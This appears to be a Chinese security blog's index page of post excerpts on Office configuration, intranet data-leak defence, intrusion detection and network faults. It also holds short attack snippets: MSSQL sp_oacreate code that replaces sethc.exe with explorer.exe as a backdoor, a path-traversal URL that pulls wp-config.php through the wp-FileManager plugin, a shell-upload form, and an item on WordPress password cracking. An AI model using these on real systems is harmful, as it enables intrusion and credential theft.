告别Office 2010的自动配置

微软的办公组件Office 2010出来也有一段日子了,以Word为例,虽然还比较顾忌其生成的.docx之类的新类型文件格式,但由于其向下兼容之前2003/2007的.doc和提供了N多种新功能的缘故,相信已经有不少人在使用2010了。不过笔者最近在将自己的Office 2003升级到2010之后,却遇到了一个比较棘手的问题,那就是每次启动都会先出现一个“安装程序正在准备必要的文件,请稍候”提示框,然后就开始了长达几分钟的“正在配置Microsoft Office Professional Plus 2010…”过程(如图1),至于具体配置了什么倒不清楚,但每次都浪费时间很是讨厌,怎么办呢?

标签:

加强防护,让内网远离数据泄露

  最近,不少单位内网数据泄漏事件频繁发生,它们预示着单位内网在数据泄露防护方面的严重不足。在不惜重金全力应对外网攻击而筑起单位外网安全的高墙时,我们有没有想过单位内网一个微不足道的漏洞也能造成整个网络安全防线的崩溃?攘外必先安内,不然的话一个小疏忽、小漏洞就能让单位所有的安全防护付诸东流。与病毒木马、黑客间谍等明确的攻击相比,内网中的数据泄露攻击更有针对性,其危害性也更大。有鉴于此,我们需要对内网安全加强防护,让内网远离数据泄露。

标签:

深入剖析计算机数据库入侵检测技术

【摘要】根据入侵检测系统和数据挖掘技术的特征,提出一种运用数据挖掘技术的入侵检测系统。它的架构包括数据采集、规则建立、异常检测、响应处理。采用改进的Apriori算法,即关联规则数据挖掘技术从系统有关数据中提取有关行为特征和规则,从而用于建立数据库安全异常模式或正常模式。

标签:

【转】sa无xp_cmdshell下提升权限简单方法

在用exec sp_oacreate ''wscript.shell''也没办法的情况下。。可用此方法
  (很多服务器都把''wscript.shell''给删了。)
  上网找了些资料,得到下面方法:
  复制文件:
  declare @o int
  exec sp_oacreate ''scripting.filesystemobject'', @o out
  exec sp_oamethod @o, ''copyfile'',null,''c:\windows\explorer.exe'' ,''c:\windows\system32\sethc.exe'';
  declare @oo int
  exec sp_oacreate ''scripting.filesystemobject'', @oo out

标签:

【转载】关于wordpress密码的破解思路

wordpress这种CMS国外用的非常多,安全性还是不错的,跟新快,看到这种东西,除了管理员架好之后就托管的垃圾站,持续更新的wordpress还是很让人头疼的。

标签:

让大家期待已久的黑动漫终于来了,不想错过的话抓紧抢购吧。

标签:

WordPress-wp-FileManager-File-Download漏洞利用方法

漏洞详解:http://packetstormsecurity.com/files/121637/WordPress-wp-FileManager-File-Download.html

查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。

标签:

一段上传文件代码

Shell upload attack:
<form enctype="multipart/form-data" action="http://www.test.com/upload.php" method="post">
<input type="text" name="url" value="./" /><br />
...

标签:

2013年7月MVP连任成功了

2013年7月MVP连任成功了,51CTO发出名单,不过没有收到邮件,不知道是不是企业级安全方面的。

标签:

【转】奇怪的网络时断时续现象

网管员们都会有解决各种各样网络故障的经历,一般情况下稍微有些经验的网管员都能凭借着自己的技术知识解决大多数问题,但是有些时候一些奇怪的不同寻常的故障也会使一个有经验的网管员备感困惑,甚至因找不到问题的根源而使问题迟迟得不到解决。

标签: